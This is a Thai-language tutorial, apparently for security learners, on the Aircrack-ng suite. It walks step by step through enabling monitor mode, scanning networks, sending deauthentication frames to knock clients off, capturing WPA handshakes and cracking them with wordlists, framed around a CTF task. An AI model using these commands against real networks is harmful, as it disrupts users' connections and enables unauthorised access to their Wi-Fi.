คลัง
wireless

Aircrack-ng Suite

Aircrack-ng เป็นชุดเครื่องมือมาตรฐานสำหรับ wireless security testing — ครอบคลุมตั้งแต่เปิด monitor mode, สแกน, จับ packet, inject (deauth), ไปจนถึง crack บทนี้อธิบายแต่ละเครื่องมือในชุดและ workflow รวม (เนื้อหาเพื่อทดสอบเครือข่ายที่ได้รับอนุญาต)

Intermediate#aircrack-ng#wireless#airodump#aireplay#airmon#suite#ctf

1. เครื่องมือในชุด

เครื่องมือหน้าที่
airmon-ngเปิด/ปิด monitor mode บน wireless adapter
airodump-ngสแกน + จับ packet (handshake)
aireplay-nginject packet — deauth, fake auth, replay
aircrack-ngcrack WEP/WPA จาก capture
airdecap-ngถอดรหัส capture เมื่อรู้ key
airbase-ngสร้าง rogue/fake AP

2. Monitor mode (airmon-ng)

เปิด monitor modeLinux
# ดู adapter
sudo airmon-ng

# ปิด process ที่รบกวน (NetworkManager ฯลฯ)
sudo airmon-ng check kill

# เปิด monitor mode → ได้ interface ใหม่ (เช่น wlan0mon)
sudo airmon-ng start wlan0

# ปิดเมื่อเสร็จ
sudo airmon-ng stop wlan0mon
ต้องใช้ adapter ที่รองรับ monitor mode + packet injection (เช่น chipset Atheros/Ralink บางรุ่น)

3. สแกนและจับ (airodump-ng)

airodump-ngLinux
# สแกนทุก AP รอบตัว (ดู BSSID, channel, encryption, client)
sudo airodump-ng wlan0mon

# จับเฉพาะ AP เป้าหมาย (ระบุ channel + BSSID + เขียนไฟล์)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# มุมขวาบนจะขึ้น "WPA handshake: ..." เมื่อจับได้

# คอลัมน์สำคัญ: BSSID (MAC ของ AP), PWR (สัญญาณ),
# CH (channel), ENC (WPA2/WPA3), STATION (client ที่เชื่อม)

4. Inject (aireplay-ng)

deauth และ test injectionLinux
# ทดสอบว่า adapter inject ได้ไหม
sudo aireplay-ng --test wlan0mon

# deauth — เตะ client เพื่อบังคับ reconnect (เกิด handshake)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# เตะ client เฉพาะตัว
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon

# deauth 0 = ส่งต่อเนื่อง (ใช้ระวัง)
deauth จำนวนน้อย (5) พอให้ client reconnect; ส่งเฉพาะ client เป้าหมายแม่นกว่า broadcast

5. Crack (aircrack-ng)

crack จาก captureLinux
# WPA/WPA2 ด้วย wordlist
aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap

# ตรวจว่าไฟล์มี handshake ไหม
aircrack-ng capture-01.cap
# (สำหรับ GPU/เร็วกว่า ใช้ hashcat — ดูหัวข้อ WPA2 และ Hashcat Workflow)
aircrack-ng ใช้ CPU; งานใหญ่แปลงเป็น hashcat mode 22000 เพื่อใช้ GPU

6. Quick Reference

  • ชุด: airmon (monitor), airodump (จับ), aireplay (inject), aircrack (crack)
  • monitor: airmon-ng check kill; airmon-ng start wlan0
  • สแกน/จับ: airodump-ng -c CH --bssid BSSID -w cap wlan0mon
  • deauth: aireplay-ng --deauth 5 -a BSSID wlan0mon
  • crack: aircrack-ng -w wordlist -b BSSID cap-01.cap
  • ต้องมี adapter รองรับ monitor+injection; ใช้ตามกฎหมาย

🧭 จับมือทำทีละขั้น (มีแค่ Kali) + ถ้าติดไปไหนต่อ

สมมติเพิ่งเจอโจทย์ CTF ที่ต้อง crack Wi-Fi ของเป้าหมาย มีแค่เครื่อง Kali เปล่าๆ กับ USB wireless adapter — ทำตามนี้ทีละขั้น ใช้แค่ชุด aircrack-ng ก็ครบ workflow ตั้งแต่เปิด monitor mode จนได้ passphrase

  1. 1เช็ค adapter: พิมพ์ iwconfig ดู interface ไร้สาย แล้ว sudo airmon-ng ดูว่า chipset รองรับ monitor mode — ควรเห็นชื่อ adapter ในลิสต์
  2. 2ปิด process ที่รบกวน: sudo airmon-ng check kill — ปิด NetworkManager/wpa_supplicant ที่แย่ง interface
  3. 3เปิด monitor mode: sudo airmon-ng start wlan0 — ควรเห็น interface ใหม่ เช่น wlan0mon
  4. 4สแกนหาเป้าหมาย: sudo airodump-ng wlan0mon — จดค่า BSSID, CH (channel), ENC ของ AP เป้าหมายที่โจทย์ให้ (SSID)
  5. 5จับเฉพาะเป้าหมาย (Ctrl+C ออกจากสแกนก่อน): sudo airodump-ng -c <CH> --bssid <BSSID> -w cap wlan0mon — ปล่อยรันทิ้งไว้
  6. 6เปิด terminal ใหม่ยิง deauth: sudo aireplay-ng --deauth 5 -a <BSSID> wlan0mon — เตะ client ให้หลุดแล้วต่อใหม่
  7. 7กลับไปดู terminal airodump มุมขวาบน — ควรขึ้นข้อความ WPA handshake: <BSSID> แปลว่าจับสำเร็จ
  8. 8ตรวจว่า handshake ครบ: aircrack-ng cap-01.cap — ต้องเห็น AP เป้าหมายมีคำว่า (handshake) กำกับ
  9. 9crack ด้วย wordlist มาตรฐาน: aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> cap-01.cap
  10. 10ถ้าไม่เจอในรอบแรก อย่าเพิ่งถอดใจ — ไปดู decision tree ด้านล่างว่าควร pivot ไปทางไหนต่อ
เจอโจทย์ Wi-Fi — ตัดสินใจทีละขั้น
เช็ค wireless adapter รองรับ monitor+injection ไหม
sudo airmon-ng
✅ รองรับ→ เปิด monitor mode ต่อ
❌ ไม่รองรับ→ หา adapter ภายนอก (Alfa/Atheros/Ralink) ที่รองรับ injection
เปิด monitor mode + สแกนหาเป้าหมาย
airmon-ng start wlan0; airodump-ng wlan0mon
ดูคอลัมน์ ENC/AUTH ของ AP เป้าหมาย
เป็น WPA3 (SAE)→ ไปดูวิธีจัดการ WPA3 ก่อน (ไม่ใช่ handshake ปกติ)
เป็น WPA2/WPA→ จับ handshake แบบคลาสสิก
จับ handshake ด้วย deauth
aireplay-ng --deauth 5 -a BSSID wlan0mon
✅ เห็น 'WPA handshake:' มุมขวาบน→ verify handshake
❌ ไม่เห็นหลัง deauth หลายรอบ (ไม่มี client)→ ลอง PMKID (ไม่ต้องมี client)
ขั้นตอน/งานเครื่องมือใน Kaliติดตั้งเพิ่ม (ถ้าไม่มี)เครื่องมือออนไลน์
เปิด monitor modeairmon-ng--
สแกน/จับ handshakeairodump-ng--
deauth / injectaireplay-ng--
จับ PMKID (clientless)-apt install hcxtools hcxdumptool-
ตรวจ/แปลง captureaircrack-ng, wireshark-cyberchef.org (แกะ hex ของ frame)
crack ด้วย wordlistaircrack-ng-weakpass.com (wordlist ใหญ่)
crack เร็วด้วย GPU-apt install hashcathashcat.net/wiki (mode 22000)
เทียบ hash กับฐานข้อมูลสาธารณะ--wpa-sec.stanev.org (upload handshake)
🚑 ถ้าตันสนิท ลองท่าถัดไป: Handshake Analysis — ถ้าไม่แน่ใจว่า capture ครบไหม/มี noise ปน; Hashcat Workflow — ถ้า wordlist ธรรมดา crack ไม่ผ่านและต้องการ mask/rule บน GPU; WPA2 — ถ้าไม่มี client เลยและอยากรู้ทาง PMKID เชิงลึก; WPA3 — ถ้า ENC ขึ้น SAE/WPA3 (ไม่ใช่ WPA2 handshake ปกติ)

โน้ตของฉัน

ยังไม่มีโน้ตสำหรับหัวข้อนี้